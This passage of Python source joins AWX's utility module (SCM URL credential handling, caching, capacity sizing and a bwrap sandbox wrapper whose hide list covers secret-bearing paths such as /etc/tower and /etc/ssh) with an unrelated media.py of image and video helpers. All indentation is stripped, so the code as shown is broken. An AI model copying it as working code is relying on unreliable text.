'wrap_args_with_proot', 'build_proot_temp_dir', 'check_proot_installed', 'model_to_dict',
'NullablePromptPseudoField', 'model_instance_diff', 'parse_yaml_or_json', 'RequireDebugTrueOrTest',
'has_model_field_prefetched', 'set_environ', 'IllegalArgumentError', 'get_custom_venv_choices', 'get_external_account',
'task_manager_bulk_reschedule', 'schedule_task_manager', 'classproperty', 'create_temporary_fifo']
def get_object_or_400(klass, *args, **kwargs):
'''
Return a single object from the given model or queryset based on the query
params, otherwise raise an exception that will return in a 400 response.
'''
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def region_sorting(region):
# python3's removal of sorted(cmp=...) is _stupid_
if region[1].lower() == 'all':
return ''
elif region[1].lower().startswith('us'):
return region[1]
return 'ZZZ' + str(region[1])
def camelcase_to_underscore(s):
'''
Convert CamelCase names to lowercase_with_underscore.
'''
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
'''
Convert lowercase_with_underscore names to CamelCase.
'''
return ''.join(x.capitalize() or '_' for x in s.split('_'))
class RequireDebugTrueOrTest(logging.Filter):
'''
Logging filter to output when in DEBUG mode or running tests.
'''
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
'''
Decorator to wrap a function and cache its result.
'''
if cache_key and track_function:
raise IllegalArgumentError("Can not specify cache_key when track_function is True")
cache = cache or get_memoize_cache()
def memoize_decorator(f):
@wraps(f)
def _memoizer(*args, **kwargs):
if track_function:
cache_dict_key = slugify('%r %r' % (args, kwargs))
key = slugify("%s" % f.__name__)
cache_dict = cache.get(key) or dict()
if cache_dict_key not in cache_dict:
value = f(*args, **kwargs)
cache_dict[cache_dict_key] = value
cache.set(key, cache_dict, ttl)
else:
value = cache_dict[cache_dict_key]
else:
key = cache_key or slugify('%s %r %r' % (f.__name__, args, kwargs))
value = cache.get(key)
if value is None:
value = f(*args, **kwargs)
cache.set(key, value, ttl)
return value
return _memoizer
return memoize_decorator
def memoize_delete(function_name):
cache = get_memoize_cache()
return cache.delete(function_name)
def _get_ansible_version(ansible_path):
'''
Return Ansible version installed.
Ansible path needs to be provided to account for custom virtual environments
'''
try:
proc = subprocess.Popen([ansible_path, '--version'],
stdout=subprocess.PIPE)
result = smart_str(proc.communicate()[0])
return result.split('\n')[0].replace('ansible', '').strip()
except Exception:
return 'unknown'
@memoize()
def get_ansible_version():
return _get_ansible_version('ansible')
@memoize()
def get_ssh_version():
'''
Return SSH version installed.
'''
try:
proc = subprocess.Popen(['ssh', '-V'],
stderr=subprocess.PIPE)
result = smart_str(proc.communicate()[1])
return result.split(" ")[0].split("_")[1]
except Exception:
return 'unknown'
def get_awx_version():
'''
Return AWX version as reported by setuptools.
'''
from awx import __version__
try:
import pkg_resources
return pkg_resources.require('awx')[0].version
except Exception:
return __version__
class StubLicense(object):
features = {
'activity_streams': True,
'ha': True,
'ldap': True,
'multiple_organizations': True,
'surveys': True,
'system_tracking': True,
'rebranding': True,
'enterprise_auth': True,
'workflows': True,
}
def validate(self):
return dict(license_key='OPEN',
valid_key=True,
compliant=True,
features=self.features,
license_type='open')
def get_licenser(*args, **kwargs):
try:
from tower_license import TowerLicense
return TowerLicense(*args, **kwargs)
except ImportError:
return StubLicense(*args, **kwargs)
def update_scm_url(scm_type, url, username=True, password=True,
check_special_cases=True, scp_format=False):
'''
Update the given SCM URL to add/replace/remove the username/password. When
username/password is True, preserve existing username/password, when
False (None, '', etc.), remove any existing username/password, otherwise
replace username/password. Also validates the given URL.
'''
# Handle all of the URL formats supported by the SCM systems:
# git: https://www.kernel.org/pub/software/scm/git/docs/git-clone.html#URLS
# hg: http://www.selenic.com/mercurial/hg.1.html#url-paths
# svn: http://svnbook.red-bean.com/en/1.7/svn-book.html#svn.advanced.reposurls
if scm_type not in ('git', 'hg', 'svn', 'insights'):
raise ValueError(_('Unsupported SCM type "%s"') % str(scm_type))
if not url.strip():
return ''
parts = urllib.parse.urlsplit(url)
try:
parts.port
except ValueError:
raise ValueError(_('Invalid %s URL') % scm_type)
if parts.scheme == 'git+ssh' and not scp_format:
raise ValueError(_('Unsupported %s URL') % scm_type)
if '://' not in url:
# Handle SCP-style URLs for git (e.g. [user@]host.xz:path/to/repo.git/).
if scm_type == 'git' and ':' in url:
if '@' in url:
userpass, hostpath = url.split('@', 1)
else:
userpass, hostpath = '', url
if hostpath.count(':') > 1:
raise ValueError(_('Invalid %s URL') % scm_type)
host, path = hostpath.split(':', 1)
#if not path.startswith('/') and not path.startswith('~/'):
# path = '~/%s' % path
#if path.startswith('/'):
# path = path.lstrip('/')
hostpath = '/'.join([host, path])
modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before passed to git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git and hg.
elif scm_type in ('git', 'hg'):
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'hg': ('http', 'https', 'ssh', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https')
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
#raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
special_hg_hosts = ('bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'hg' and parts.scheme == 'ssh' and parts.hostname in special_hg_hosts and netloc_username != 'hg':
raise ValueError(_('Username must be "hg" for SSH access to %s.') % parts.hostname)
if scm_type == 'hg' and parts.scheme == 'ssh' and netloc_password:
#raise ValueError('Password not supported for SSH with Mercurial.')
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type != "insights":
netloc = u':'.join([urllib.parse.quote(x,safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path,
parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {
'user': ['last_login'],
'oauth2accesstoken': ['last_used'],
'oauth2application': ['client_secret']
}
field_blacklist = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(obj._meta.model_name, [])
if field_blacklist:
allowed_fields = [f for f in allowed_fields if f not in field_blacklist]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (
isinstance(field_val, str) and
field_val.startswith('$encrypted$')
):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
from django.db.models import Model
if not(old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not(new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
def model_to_dict(obj, serializer_mapping=None):
"""
Serialize a model instance to a dictionary as best as possible
serializer_mapping are used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
'''
Creates a new unsaved object of type Class2 using the fields from obj1
values in kwargs can override obj1
'''
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
'''
In-place operation.
Given two saved objects, copies related objects from obj1
to obj2 to field of same name, if field occurs in `fields`
'''
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
'''
Return type name for a given model class.
'''
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
'''
Return model class for a given type name.
'''
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def prefetch_page_capabilities(model, page, prefetch_list, user):
'''
Given a `page` list of objects, a nested dictionary of user_capabilities
are returned by id, ex.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
'''
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
# Build the query for accessible_objects according the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(Q(
Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) |
Q(**{'%s__isnull' % res_path: True})))
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(
_('Input type `{data_type}` is not a dictionary').format(
data_type=data_type)
)
def parse_yaml_or_json(vars_str, silent_failure=True):
'''
Attempt to parse a string of variables.
First, with JSON parser, if that fails, then with PyYAML.
If both attempts fail, return an empty dictionary if `silent_failure`
is True, re-raise combination error if `silent_failure` if False.
'''
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_(
'Variables not compatible with JSON standard (error: {json_error})').format(
json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(_(
'Cannot parse as JSON (error: {json_error}) or '
'YAML (error: {yaml_error}).').format(
json_error=str(json_err), yaml_error=str(yaml_err)))
return vars_dict
def get_cpu_capacity():
from django.conf import settings
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return 0, int(env_abscpu)
elif settings_abscpu is not None:
return 0, int(settings_abscpu)
cpu = psutil.cpu_count()
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return (cpu, cpu * forkcpu)
def get_mem_capacity():
from django.conf import settings
settings_forkmem = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_forkmem = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
if env_absmem is not None:
return 0, int(env_absmem)
elif settings_absmem is not None:
return 0, int(settings_absmem)
if env_forkmem:
forkmem = int(env_forkmem)
elif settings_forkmem:
forkmem = int(settings_forkmem)
else:
forkmem = 100
mem = psutil.virtual_memory().total
return (mem, max(1, ((mem // 1024 // 1024) - 2048) // forkmem))
def get_system_task_capacity(scale=Decimal(1.0), cpu_capacity=None, mem_capacity=None):
'''
Measure system memory and use it as a baseline for determining the system's capacity
'''
from django.conf import settings
settings_forks = getattr(settings, 'SYSTEM_TASK_FORKS_CAPACITY', None)
env_forks = os.getenv('SYSTEM_TASK_FORKS_CAPACITY', None)
if env_forks:
return int(env_forks)
elif settings_forks:
return int(settings_forks)
if cpu_capacity is None:
_, cpu_cap = get_cpu_capacity()
else:
cpu_cap = cpu_capacity
if mem_capacity is None:
_, mem_cap = get_mem_capacity()
else:
mem_cap = mem_capacity
return min(mem_cap, cpu_cap) + ((max(mem_cap, cpu_cap) - min(mem_cap, cpu_cap)) * scale)
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
'''
Context manager to ignore updating inventory computed fields.
'''
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times.
"""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
'''
Context manager to ignore moving groups/hosts when group is deleted.
'''
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
'''
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
'''
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
@memoize()
def check_proot_installed():
'''
Check that proot is installed.
'''
from django.conf import settings
cmd = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
logger.exception('bwrap unavailable for unexpected reason.')
return False
def build_proot_temp_dir():
'''
Create a temporary directory for proot to use.
'''
from django.conf import settings
path = tempfile.mkdtemp(prefix='awx_proot_', dir=settings.AWX_PROOT_BASE_PATH)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
return path
def wrap_args_with_proot(args, cwd, **kwargs):
'''
Wrap existing command line with proot to restrict access to:
- AWX_PROOT_BASE_PATH (generally, /tmp) (except for own /tmp files)
For non-isolated nodes:
- /etc/tower (to prevent obtaining db info or secret key)
- /var/lib/awx (except for current project)
- /var/log/tower
- /var/log/supervisor
'''
from django.conf import settings
cwd = os.path.realpath(cwd)
new_args = [getattr(settings, 'AWX_PROOT_CMD', 'bwrap'), '--unshare-pid', '--dev-bind', '/', '/', '--proc', '/proc']
hide_paths = [settings.AWX_PROOT_BASE_PATH]
if not kwargs.get('isolated'):
hide_paths.extend(['/etc/tower', '/var/lib/awx', '/var/log', '/etc/ssh',
settings.PROJECTS_ROOT, settings.JOBOUTPUT_ROOT])
hide_paths.extend(getattr(settings, 'AWX_PROOT_HIDE_PATHS', None) or [])
for path in sorted(set(hide_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
if os.path.isdir(path):
new_path = tempfile.mkdtemp(dir=kwargs['proot_temp_dir'])
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
else:
handle, new_path = tempfile.mkstemp(dir=kwargs['proot_temp_dir'])
os.close(handle)
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR)
new_args.extend(['--bind', '%s' %(new_path,), '%s' % (path,)])
if kwargs.get('isolated'):
show_paths = [kwargs['private_data_dir']]
elif 'private_data_dir' in kwargs:
show_paths = [cwd, kwargs['private_data_dir']]
else:
show_paths = [cwd]
for venv in (
settings.ANSIBLE_VENV_PATH,
settings.AWX_VENV_PATH,
kwargs.get('proot_custom_virtualenv')
):
if venv:
new_args.extend(['--ro-bind', venv, venv])
show_paths.extend(getattr(settings, 'AWX_PROOT_SHOW_PATHS', None) or [])
show_paths.extend(kwargs.get('proot_show_paths', []))
for path in sorted(set(show_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
new_args.extend(['--bind', '%s' % (path,), '%s' % (path,)])
if kwargs.get('isolated'):
if '/bin/ansible-playbook' in ' '.join(args):
# playbook runs should cwd to the SCM checkout dir
new_args.extend(['--chdir', os.path.join(kwargs['private_data_dir'], 'project')])
else:
# ad-hoc runs should cwd to the root of the private data dir
new_args.extend(['--chdir', kwargs['private_data_dir']])
else:
new_args.extend(['--chdir', cwd])
new_args.extend(args)
return new_args
def get_pk_from_dict(_dict, key):
'''
Helper for obtaining a pk from user data dict or None if not present.
'''
try:
val = _dict[key]
if isinstance(val, object) and hasattr(val, 'id'):
return val.id # return id if given model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices(custom_paths=None):
from django.conf import settings
custom_paths = custom_paths or settings.CUSTOM_VENV_PATHS
all_venv_paths = [settings.BASE_VENV_PATH] + custom_paths
custom_venv_choices = []
for custom_venv_path in all_venv_paths:
if os.path.exists(custom_venv_path):
custom_venv_choices.extend([
os.path.join(custom_venv_path, x, '')
for x in os.listdir(custom_venv_path)
if x != 'awx' and
os.path.isdir(os.path.join(custom_venv_path, x)) and
os.path.exists(os.path.join(custom_venv_path, x, 'bin', 'activate'))
])
return custom_venv_choices
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email',
'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None),
'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or
getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(
target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)
).start()
return path
|
media.py
|
from PIL import Image
from typing import List
from machin.parallel import get_context
import os
import numpy as np
import moviepy.editor as mpy
import matplotlib.pyplot as plt
def show_image(
image: np.ndarray,
show_normalized: bool = True,
pause_time: float = 0.01,
title: str = "",
):
"""
Use matplotlib to show a single image. You may repeatedly call this method
with the same ``title`` argument to show a video or a dynamically changing
image.
Args:
image: A numpy array of shape (H, W, C) or (H, W), and with ``dtype``
= any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
show_normalized: Show normalized image alongside the original one.
pause_time: Pause time between displaying current image and the next
one.
title: Title of the display window.
"""
if np.issubdtype(image.dtype, np.integer):
image = image.astype(np.floating) / 255
fig = plt.figure(title, clear=True)
fig.canvas.set_window_title(title)
if show_normalized:
ax = fig.add_subplot("121")
ax.set_facecolor((0.0, 0.0, 0.0))
ax.imshow(image, vmin=np.min(image), vmax=np.max(image))
ax2 = fig.add_subplot("122")
ax2.set_facecolor((0.0, 0.0, 0.0))
pix_range = (np.max(image) - np.min(image)) + 1e-6
ax2.imshow((image - np.min(image)) / pix_range, vmin=0, vmax=1)
plt.pause(pause_time)
else:
ax = fig.add_subplot("111")
ax.set_facecolor((0.0, 0.0, 0.0))
ax.imshow(image, vmin=np.min(image), vmax=np.max(image))
plt.pause(pause_time)
def create_video(
frames: List[np.ndarray],
path: str,
filename: str,
extension: str = ".gif",
fps: int = 15,
):
"""
Args:
frames: A list of numpy arrays of shape (H, W, C) or (H, W), and with
``dtype`` = any float or any int.
When a frame is float type, its value range should be [0, 1].
When a frame is integer type, its value range should be [0, 255].
path: Directory to save the video.
filename: File name.
extension: File extension.
fps: frames per second.
"""
if frames:
for f in range(len(frames)):
if np.issubdtype(frames[f].dtype, np.integer):
frames[f] = frames[f].astype(np.uint8)
elif np.issubdtype(frames[f].dtype, np.floating):
frames[f] = (frames[f] * 255).astype(np.uint8)
if frames[f].ndim == 2:
# consider as a grey scale image
frames[f] = np.repeat(frames[f][:, :, np.newaxis], 3, axis=2)
clip = mpy.ImageSequenceClip(frames, fps=fps)
if extension.lower() == ".gif":
clip.write_gif(
os.path.join(path, filename + extension),
fps=fps,
verbose=False,
logger=None,
)
else:
clip.write_videofile(
os.path.join(path, filename + extension),
fps=fps,
verbose=False,
logger=None,
)
